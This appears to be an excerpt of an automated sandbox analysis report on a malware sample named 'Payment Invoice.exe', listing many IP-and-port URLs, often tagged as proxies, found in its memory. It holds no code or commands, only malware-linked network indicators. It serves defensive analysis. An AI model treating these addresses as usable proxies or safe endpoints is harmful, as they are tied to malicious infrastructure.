                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.192.102.249:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.192.102.249:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.192.121.240:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.192.138
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.192.138.170:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.192.138.170:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.192.233.69:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.192.233.69:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.104.153:8200
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.104.153:8200://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.61.169:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.61.169:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.166
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.166.21:1372
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.166.21:1372://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.166.21:21898
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.166.21:21898://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.166.21:25154
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.166.21:25154://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.166.21:47460://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.166.21:5078
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.166.21:5078://proxy0q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:51616
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:51616://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:56581
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:56581://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:59098
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:59098://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:59243
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:59243://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317BBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:61818
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:61818://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.65.245.255
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163184D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.65.245.255://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163184BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.65.245.255:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631998E000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163198AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.65.77.168:8585
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163198C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.65.77.168:8585://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.75.49.140:10808
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.75.49.140:10808://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.89.194.121:16075
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.89.194.121:16075://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.89.194.121:21193
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.89.194.121:21193://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.119.128.66:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.119.128.66:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.119.148
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.119.148.190:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.119.148.190:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:31745
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:31745://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:35138
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:35138://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:38586
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:38586://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:59786
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:59786://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:6116
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:6116://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.16.90.35:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.16.90.35:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.19.169.208:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.19.169.208:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91:2525
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91:2525://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316823000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91:587
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316823000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91:587://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.3.168.7
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.3.168.70:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.3.168.70:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319AC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.156.199.78
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.156.199.78://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319A43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.156.199.78:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.202.226.194:8123
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.202.226.194:8123://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.34.67.8
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.34.67.83:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.34.67.83:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.35.88.210:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.35.88.210:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631815E000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.49.90.70:1337
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631815E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.49.90.70:1337://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.49.91.13:1337
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.49.91.13:1337://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.132.227:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316E86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.132.227:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.147.193:12762
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.147.193:12762://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.147.193:2838
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.147.193:2838://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:1798
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:1798://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:30189
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:30189://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:32092
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:34916
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:34916://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:55109
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:55109://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:64120
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:64120://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:9045
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:9045://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.170.209:62291
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.170.209:62291://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.42:50386
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.42:50386://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.42:62289
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.42:62289://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317355000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317367000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.78:26552
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.78:26552://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.78:49145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.78:49145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.74.176:30000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.74.176:30000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.0.220.161:25159
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.120.71.11
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.120.71.11://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.120.71.11:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.121.232
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.121.232:16795
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.121.232:16795://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.121.232:19404
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.121.232:19404://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.121.232:24787
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.121.232:24787://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.121.232:27262
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.121.232:27262://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.236.128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.236.128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.236.128:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.36.208:27531
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.36.208:27531://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.36.208:38242
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.36.208:38242://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.241.5
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.241.5://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.241.5:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.10
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163179C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.104
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.104://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.10://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.10:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.138
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.138://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.138:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.8
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.8://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.8:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.246.135
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.246.135://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.246.135:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.247.57
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.247.57://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.247.57:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.19.7.49:17922
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.19.7.49:17922://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.19.7.53:64654
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.19.7.53:64654://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.19.7.56:44195
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.19.7.56:44195://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.19.7.61:25525
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.19.7.61:25525://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.102.195:34227
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.102.195:34227://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.102.195:60891
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.102.195:60891://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.103.87:36304
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.103.87:36304://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.121.11:8989
